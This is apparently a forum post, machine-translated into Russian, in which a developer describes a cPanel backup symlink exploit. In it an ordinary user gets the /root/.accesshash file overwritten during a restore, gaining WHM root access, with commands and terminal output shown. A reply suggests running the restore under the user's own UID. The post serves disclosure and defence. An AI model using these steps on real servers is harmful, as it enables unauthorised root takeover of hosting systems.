В данный момент я работаю над решением для резервного копирования cPanel. Теперь мы проинформированы об этом эксплойте.
Эксплойт: Полный ROOT ДОСТУП к серверу
1.) создать вредоносный файл из обычной учетной записи пользователя:
mkdir root
echo "hello" > root/.accesshash
2.) Дождитесь запуска резервного копирования
3.) Замените root символической ссылкой:
ln -s /root root
4.) Восстановите root / .accesshash (для этого я запускаю эту команду как root: "cp -rf /backup/.accesshash / home / username / root /")
5.) Теперь у пользователя есть root-доступ, потому что мы перезаписали /root/.accesshash. Злоумышленник сможет войти в WHM как root, поместив хэш доступа в этот файл.
root@cpanel [/home/master]# cat /root/.accesshash
hello
root@cpanel [/home/master]# ls -l /root/.accesshash
-rw-r--r-- 1 master master 3 Nov 20 21:41 /root/.accesshash
root@cpanel [/home/master]#
Может ли кто-нибудь посоветовать мне обходной путь? Заранее спасибо.
Я бы удостоверился, что резервные файлы доступны для пользователя, которому они принадлежат, и запустил копию / rsync с UID этого пользователя. Таким образом, cp / rsync не сможет следовать символической ссылке и писать в /root
.